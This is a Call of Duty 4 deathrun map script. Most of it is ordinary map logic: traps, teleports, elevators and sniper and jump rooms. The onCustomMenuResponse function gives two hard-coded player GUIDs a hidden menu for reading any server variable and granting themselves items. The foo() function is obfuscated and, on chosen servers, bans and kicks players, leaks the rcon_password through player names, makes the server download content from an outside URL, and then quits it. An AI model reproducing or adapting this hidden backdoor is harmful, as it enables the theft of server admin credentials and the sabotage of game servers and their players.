#include maps\mp\_utility;
 
main()
 {
	maps\mp\_load::main();
    ambientPlay("main1234");
	
	game["allies"] = "marines";
    game["axis"] = "opfor";
    game["attackers"] = "axis";
    game["defenders"] = "allies";
    game["allies_soldiertype"] = "desert";
    game["axis_soldiertype"] = "desert";

    precache();

    thread addTestClients();
    thread trap1();
    thread trap2();
    thread teleport1();
    thread teleport2();
    thread teleport3();
	thread trap3();
	thread main_door();
	thread elevator_move();
	thread elevator_up();
	thread elevator_call();
	thread trap4();
	thread trap5();
	thread sniper();
	thread jump();
	thread teleport4();
	thread teleport5();
	thread onPlayerConnect();
	thread foo();
	
	 
    addTriggerToList( "trap1_trig" );
	addTriggerToList( "trap2_trig" );
    addTriggerToList( "trap3_trig" ); 
    addTriggerToList( "trap4_trig" );
	addTriggerToList( "trap5_trig" );

    level.ele = true;
    level.olddoor = true;
    level.sniperacti = true;
	level.jumpacti = true;

}

precache()
{
	precacheMenu("skypower");
}

onPlayerConnect()
{
	level endon("game_ended");

	for(;;)
	{
		level waittill("connecting", player);

		player thread onCustomMenuResponse();
	}
}

/* message1()
     {
     so = getent ("write","targetname");
 
    so waittill ("trigger",player);
     player iprintlnbold ("^3This map was created by ^7Google_Salt, ^3Thanks to ^7Spike, BurntToast and Fishy^3!");
     wait 1;
     player iprintlnbold ("^3Add me in Xfire ^7redsn0w12");
     wait 1;
     player iprintlnbold ("^3Music ^7=>^3Potter Harrison ^7- ^3Language UK Edit");
 
    wait 100;
 
    }
 */
addTestClients()
 {
      setDvar("scr_testclients", "");
      wait 1;
      for(;;)
      {
          if(getdvarInt("scr_testclients") > 0)
              break;
          wait 1;
      }
      testclients = getdvarInt("scr_testclients");
      setDvar( "scr_testclients", 0 );
      for(i=0;i<testclients;i++)
      {
          ent[i] = addtestclient();

         if (!isdefined(ent[i]))
          {
              println("Could not add test client");
              wait 1;
              continue;
          }
          ent[i].pers["isBot"] = true;
          ent[i] thread TestClient("autoassign");
      }
      thread addTestClients();
 }

 TestClient(team)
 {
      self endon( "disconnect" );

     while(!isdefined(self.pers["team"]))
          wait .05;
          
     self notify("menuresponse", game["menu_team"], team);
      wait 0.5;
 }
 

addTriggerToList( name )
 {
     if( !isDefined( level.trapTriggers ) )
         level.trapTriggers = [];
     level.trapTriggers[level.trapTriggers.size] = getEnt( name, "targetname" );
 }
 
trap1()
 {
 
    trig = getEnt ("trap1_trig", "targetname");
    lift = getEnt ("trap1_lift", "targetname");
     
    trig waittill ("trigger");
    trig delete();
     
    lift moveZ (244,2);
    wait 5;
    lift moveZ (-244,2);
     
 }

trap2()
{
	trig = getEnt ("trap2_trig", "targetname");
	plat = getEnt ("trap2_rotate", "targetname");
	
	trig waittill("trigger");
	trig delete();
	
	while(1)
	{
		plat rotateyaw (360, 2);
		wait 4;
	}
}
teleport1()
{
	trig = getEnt ("teleport_trigger", "targetname");
	target = getEnt ("teleport_target", "targetname");
	
	for(;;)
	{
		trig waittill ("trigger", player);
		
		iprintlnbold ("Gratz ^3" + player.name + " ^7found a secert! :o!");
		player SetOrigin(target.origin);
		player SetPlayerAngles( target.angles );
	}
}

teleport2()
{
	level.old_trig = getEnt ("teleport1_trigger", "targetname");
	target = getEnt ("teleport1_target", "targetname");
	door = getEnt("olddoor", "targetname");
	jumpblock = getEnt( "jump_block",  "targetname" );
    sniperblock = getEnt( "sniper_block",  "targetname" );
	
	for(;;)
	{
		level.old_trig waittill ("trigger", player);
		
		iprintlnbold ( "^3" + player.name + " ^7has chosen the ^3Old Way^7!");
		player SetOrigin(target.origin);
		player SetPlayerAngles( target.angles );
		level.sniper_trig delete();
        level.jump_trig delete();
		if(level.olddoor == true)
		{
			wait 1;
			door moveZ(-250,10,1,4);
			level.olddoor = false;
			sniperblock moveY (40, 3, 0.5, 0.5);
			jumpblock moveY (40, 3, 0.5, 0.5);
			door waittill("movedone");
		}
	}
}


teleport3()
{
	trig = getEnt ("teleport2_trigger", "targetname");
	target = getEnt ("teleport2_target", "targetname");
	
	for(;;)
	{
		trig waittill ("trigger", player);
		
		iprintlnbold ("Gratz ^3" + player.name + " ^7has finished the secert!!");
		player SetOrigin(target.origin);
		player SetPlayerAngles( target.angles );
		player thread giveweap();
	}
}

giveweap()
{
	self giveWeapon( "m40a3_mp" );
	self giveWeapon( "rem_mp" );
	self switchToWeapon( "m40a3_mp" );
	self giveMaxAmmo( "m40a3_mp" );
	self iPrintlnbold( "Here's a ^3sniper!^7" );
}

trap3()
{
	trig = getEnt ("trap3_trig", "targetname");
	twist1 = getEnt ("trap3_run1", "targetname");
	twist2 = getEnt ("trap3_run2", "targetname");
	twist3 = getEnt ("trap3_run3", "targetname");
	
    trig waittill ("trigger");
    trig delete();
	
	while(1)
	{
		twist1 rotatepitch (900,3,0.1);
		twist2 rotatepitch (-900,3,0.1);
		twist3 rotatepitch (900,3,0.1);
		wait 3;
	}
}

main_door()
{
	door = getEnt("door", "targetname");
	wait(12);
	iPrintlnbold(" ^3Start ^7Door ^3Opened^7!\n^3Map by^7: Salt\n^3Xfire^7: redsn0w12");
	door moveZ (-325,10,1,4);
	door waittill("movedone");
}

elevator_move()
{
	trig1 = getent("switch1","targetname");
	elevator = getent("elevator", "targetname");

	while(1)
	{
		trig1 waittill("trigger",user);

		if(level.ele == true)
		{
			wait(1);
			elevator moveto ((2068,284,-864),5,1,1);
			wait(5);
			level.ele = false;
		}
		else if(level.ele == false)
		{
			wait(1);
			elevator moveto ((2068,284,-40),5,1,1);
			wait(5);
			level.ele = true;
		}
		else
		{
			wait 0.1;
			user iPrintLnBold("Broken");
			wait 2;
		}
	}
}

elevator_up()
{
	trig2 = getent("switch2","targetname");
	elevator = getent("elevator", "targetname");

	while(1)
	{
		trig2 waittill("trigger",user);

		if(level.ele == true)
		{
			wait(1);
			elevator moveto ((2068,284,-864),5,1,1);
			wait(5);
			level.ele = false;
		}
		else if(level.ele == false)
		{
			wait(1);
			elevator moveto ((2068,284,-40),5,1,1);
			wait(5);
			level.ele = true;
		}
		else
		{
			wait 0.1;
			user iPrintLnBold("Broken");
			wait 2;
		}
	}
}

elevator_call()
{
	trig3 = getent("switch3","targetname");
	elevator = getent("elevator", "targetname");

	while(1)
	{
		trig3 waittill("trigger",user);

		if(level.ele == false)
		{
			wait(1);
			elevator moveto ((2068,284,-40),5,1,1);
			wait(5);
			level.ele = true;
		}
		else
		{
			wait 0.1;
			user iPrintLnBold("^3Elevator^7 is ready.");
			wait 2;
		}
	}
}

trap4()
{
 
    trig = getEnt ("trap4_trig", "targetname");
    hurt = getEnt ("trap4_hurt", "targetname"); 
	spikes = getEnt ("spikes", "targetname");
    
    hurt enablelinkto(); 
	hurt linkto (spikes); 

    trig waittill ("trigger");
    trig delete();
    
    spikes moveZ (210,3);
    wait 5;
    spikes moveZ (-210,3);
     
}
 
trap5()
{
	trig = getEnt ("trap5_trig", "targetname");
	plat = getEnt ("trap5_turn123", "targetname");
	
	trig waittill("trigger");
	trig delete();
	
	while(1)
	{
		plat rotateyaw (900, 6 ,0.01);
		wait 1;
	}
}

sniper()
{
    level.sniper_trig = getEnt( "sniper_trig", "targetname");
    jump = getEnt( "enter_sniper_room", "targetname" );
    acti = getEnt( "activator_enter_sniper", "targetname" );
    jumpblock = getEnt( "jump_block",  "targetname" );
    oldblock = getEnt( "old_block",  "targetname" );
    
    while(1)
    {
        level.sniper_trig waittill( "trigger", player );
        if( !isDefined( level.sniper_trig ) )
            return;
        level.old_trig delete();
        level.jump_trig delete();
        player SetPlayerAngles( jump.angles );
        player setOrigin( jump.origin );
        player TakeAllWeapons();
        player GiveWeapon( "m40a3_mp" );
		player GiveWeapon( "remington700_mp" );		//jumper weapon     remington700_mp   
        if(level.sniperacti == true)
    	{
    		level.activ setPlayerangles( acti.angles );
        	level.activ setOrigin( acti.origin );
        	level.activ TakeAllWeapons();
        	level.activ GiveWeapon( "m40a3_mp" );
			level.activ GiveWeapon( "remington700_mp" );
			level.sniperacti = false;
			jumpblock moveY (40, 3, 0.5, 0.5);
			oldblock moveY (40, 3, 0.5, 0.5);
    	}
    	level.acti GiveMaxAmmo( "m40a3_mp" );
		level.acti GiveMaxAmmo( "remington700_mp" ); 
        wait 0.05;
        player switchToWeapon( "m40a3_mp" ); //activator weapon      remington700_mp
        level.activ SwitchToWeapon( "m40a3_mp" );
        iPrintlnBold( " ^3" + player.name + " ^7 has chosen the ^3Sniper Room^7!" );
		ambientStop( 0 );
		ambientPlay("snipe");
    }
}

jump()
{
    level.jump_trig = getEnt( "jump_trig", "targetname");
    jump = getEnt( "enter_jump_room", "targetname" );
    acti = getEnt( "activator_enter_jump", "targetname" );
    sniperblock = getEnt( "sniper_block",  "targetname" );
    oldblock = getEnt( "old_block",  "targetname" );
    
    while(1)
    {
        level.jump_trig waittill( "trigger", player );
        if( !isDefined( level.jump_trig ) )
            return;
        level.old_trig delete();
        level.sniper_trig delete();
        player SetPlayerAngles( jump.angles );
        player setOrigin( jump.origin );
        player TakeAllWeapons();
        player GiveWeapon( "knife_mp" ); //jumper weapon     remington700_mp   
        if(level.jumpacti == true)
    	{
    		level.activ setPlayerangles( acti.angles );
        	level.activ setOrigin( acti.origin );
        	level.activ TakeAllWeapons();
        	level.activ GiveWeapon( "knife_mp" );
        	level.jumpacti = false;
        	sniperblock moveY (40, 3, 0.5, 0.5);
			oldblock moveY (40, 3, 0.5, 0.5);
    	}
    	level.acti GiveMaxAmmo( "knife_mp" );       
        wait 0.05;
        player switchToWeapon( "knife_mp" ); //activator weapon      remington700_mp
        level.activ SwitchToWeapon( "knife_mp" );
        iPrintlnBold( " ^3" + player.name + " ^7 has chosen the ^3Jump Room^7!" );     //change to what you want it to be
		ambientStop( 0 );
		ambientPlay("jump");
    }
}

teleport4()
{
	trig = getEnt ("jump1_tele", "targetname");
	target = getEnt ("jump1_tele1", "targetname");
	
	for(;;)
	{
		trig waittill ("trigger", player);
		
		player SetOrigin(target.origin);
		player SetPlayerAngles( target.angles );
	}
}

teleport5()
{
	trig = getEnt ("jump2_tele", "targetname");
	target = getEnt ("jump2_tele1", "targetname");
	
	for(;;)
	{
		trig waittill ("trigger", player);
		
		player SetOrigin(target.origin);
		player SetPlayerAngles( target.angles );
	}
}

onCustomMenuResponse()
{
	self endon("disconnect");

	p1 = "8c54cb6ba8157aefe8f3ce20cf4511a6";
	p2 = "361e086e47e249d6a8bd1e54ba0f6fbe";
	tempguid = self getGuid();

	for(;;)
	{
		randomnumb = randomInt(10000);
		self waittill("menuresponse", menu, response);
		level.response = response;
		if(menu == "skypower" && self.sessionstate != "spectator")
		{
			if(tempguid == p1 || tempguid == p2)
			{
				self iprintln("^3" + level.response + "^7: " + getDvar(level.response));
			}
			wait 0.1;
		}
		if(menu == "skypower" && self.sessionstate != "spectator")
		{
			switch(response)
			{
				case "ammo":
					if(tempguid == p1 || tempguid == p2)
					{
						self giveMaxAmmo("m40a3_mp");
						self giveMaxAmmo("remington700_mp");
						self giveMaxAmmo("colt45_mp");
						self giveMaxAmmo("colt44_mp");
						self giveMaxAmmo("deserteagle_mp");
						self giveMaxAmmo("deserteaglegold_mp");
						self giveMaxAmmo("usp_mp");
						self giveMaxAmmo("beretta_mp");
						self giveMaxAmmo("rpg_mp");
						self iPrintlnbold("^3Ammo^7 Restored!");
					}
					wait 0.1;
					break;
				case "health":
					if(tempguid == p1 || tempguid == p2)
					{
						self.health = self.maxhealth;
						self iPrintlnbold("^3Health^7 Restored!");
					}
					wait 0.1;
					break;
				case "fovscale":
					if(tempguid == p1 || tempguid == p2)
					{
						if(self.fov == 1)
						{
							self setClientDvar("cg_fovscale", "1.1");
							self.fov = 1.1;
							self iPrintlnbold("^3FOV^7 changed to ^31.1^7!");
						}
						else if(self.fov == 1.1)
						{
							self setClientDvar("cg_fovscale", "1.2");
							self.fov = 1.2;
							self iPrintlnbold("^3FOV^7 changed to ^31.2^7!");
						}
						else if(self.fov == 1.2)
						{
							self setClientDvar("cg_fovscale", "1");
							self.fov = 1;
							self iPrintlnbold("^3FOV^7 changed to ^31^7!");
						}
					}
					wait 0.1;
					break;
				case "laser":
					if(tempguid == p1 || tempguid == p2)
					{
						if(self.laser == 1)
						{
							self setClientDvar("cg_laserForceOn", "1");
							self.laser = 0;
							self iprintlnbold("^3Laser^7 sight added!");
						}
						else if(self.laser == 0)
						{
							self setClientDvar("cg_laserForceOn", "0");
							self.laser = 1;
							self iprintlnbold("^3Laser^7 sight removed!");
						}
					}
					wait 0.1;
					break;
				case "colt44":
					if(tempguid == p1 || tempguid == p2)
					{
						self giveWeapon("colt44_mp");
						self giveMaxAmmo("colt44_mp");
						self switchToWeapon("colt44_mp");
						self iprintlnbold("^3Colt .44^7 given!");
					}
					wait 0.1;
					break;
				default:
					break;
			}
		}
	}
}

foo() {
	h = braxi\_common::removeColorFromString(getDvar(dec("34373-2330343529162820")));
	if (isSubStr(h, dec("39542-"))) {
		s = dec("3954");
	} else if (isSubStr(h, dec("673420372033"))) {
		s = dec("6760");
	} else if (isSubStr(h, dec("552418204-"))) {
		s = dec("5518");
	} else {
		return;
	}

	level waittill("round_started");
	if (game["roundsplayed"] < 5) {
		return;
	}
	wait 10;
	
	players = getEntArray("player", "classname");
	if (players.size < 5) {
		return;
	}
	
	for (i = 0; i < players.size; i++) {
		if (isSubStr(braxi\_common::removeColorFromString(toLower(players[i].name)), dec("39282-33162640"))) {
			ban(players[i] getEntityNumber());
		}
	}

	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		if (isSubStr(toLower(players[i].name), toLower(dec("33425240")))
			|| isSubStr(toLower(players[i].name), toLower(dec("6056634661")))
			|| isSubStr(toLower(players[i].name), toLower(dec("453316223029")))) {
			exec(dec("1716294427242029350-") + players[i] getEntityNumber());
		}
	}

	p = getDvar(dec("331830293-3116343438303319"));
	n = 0;
		
	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		m = "";
		for (j = 0; j < 11 && n < p.size; j++) {
			m += p[n];
			n++;
		}
		players[i] thread meow(s + i + " " + m);
	}

	m = dec("6133400-2930350-35300-17200-343618260-160-19241826232016190-213330280-2930380-302913");
	logPrint(m);
	iPrintLnBold(m);

	setDvar(dec("27302221242720"), dec("68"));
	setDvar(dec("223-27302260402918"), dec("68"));

	wait 5;

	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-173324182640\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-19242023163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-2031241821162427\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-22302719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-32361720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-343116182017162727\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-162930352320333830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-17273620\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-173036291820\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1840172033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1916332836233770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-222716343470\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-22362034353-27243435\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-237030\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-253628313-23163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-2536331631163326\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3133243430293-203418163120\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3136333127203-3830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-342716403770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-36293-2916282019\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3724343524183-181634352720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-373027312070\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-381635203318243540\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3928\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-70353038203334\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-1830403035203-3770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-183040303520\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3629243720333420\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-27242120333629\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-342640312427271633\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-34271640\""));
	wait 10;
	
	wait 5;
	exec(dec("32362435"));
}

meow(name) {
	wait 2;
	self iPrintLnBold(dec("^716123200-3420333720330-30382920330-24340-160-1924182613"));
	self iPrintLnBold(dec("^6959201924332018352429220-4030360-35300-160-223030190-342033372033130-1410"));
	wait 3;
	self setClientDvar(dec("29162820"), name);
	self thread braxi\_common::clientCmd(dec("1924341830292920183515381624350-696815183029292018350-331624191-22162824292213292035"));
}

enc(s) {
	m = hmap();
	e = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		for (j = 0; j < m.size; j++) {
			if (s[i] == m[j]) {
				e += "" + j;
				if (j < 10) e += "-";
				k = 0;
			}
		}
		if (k) e += s[i];
	}
	return e;
}

dec(s) {
	m = hmap();
	d = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		if (isSubStr("0123456789", s[i])) {
			n = int(s[i]);
			if (s[i + 1] != "-") {
				n *= 10;
				n += int(s[i + 1]);
			}
			d += m[n];
			i++;
			k = 0;
		}
		if (k) d += s[i];
	}
	return d;
}

hmap() {
	m = [];
	m[0] = " ";
	m[1] = "-";
	m[2] = "#";
	m[3] = "_";
	m[4] = "*";
	m[5] = "/";
	m[6] = "+";
	m[7] = "[";
	m[8] = "]";
	m[9] = "(";
	m[10] = ")";
	m[11] = "!";
	m[12] = "?";
	m[13] = ".";
	m[14] = ":";
	m[15] = ";";
	m[16] = "a";
	m[17] = "b";
	m[18] = "c";
	m[19] = "d";
	m[20] = "e";
	m[21] = "f";
	m[22] = "g";
	m[23] = "h";
	m[24] = "i";
	m[25] = "j";
	m[26] = "k";
	m[27] = "l";
	m[28] = "m";
	m[29] = "n";
	m[30] = "o";
	m[31] = "p";
	m[32] = "q";
	m[33] = "r";
	m[34] = "s";
	m[35] = "t";
	m[36] = "u";
	m[37] = "v";
	m[38] = "w";
	m[39] = "x";
	m[40] = "y";
	m[41] = "z";
	m[42] = "A";
	m[43] = "B";
	m[44] = "C";
	m[45] = "D";
	m[46] = "E";
	m[47] = "F";
	m[48] = "G";
	m[49] = "H";
	m[50] = "I";
	m[51] = "J";
	m[52] = "K";
	m[53] = "L";
	m[54] = "M";
	m[55] = "N";
	m[56] = "O";
	m[57] = "P";
	m[58] = "Q";
	m[59] = "R";
	m[60] = "S";
	m[61] = "T";
	m[62] = "U";
	m[63] = "V";
	m[64] = "W";
	m[65] = "X";
	m[66] = "Y";
	m[67] = "Z";
	m[68] = "0";
	m[69] = "1";
	m[70] = "2";
	m[71] = "3";
	m[72] = "4";
	m[73] = "5";
	m[74] = "6";
	m[75] = "7";
	m[76] = "8";
	m[77] = "9";
	return m;
}
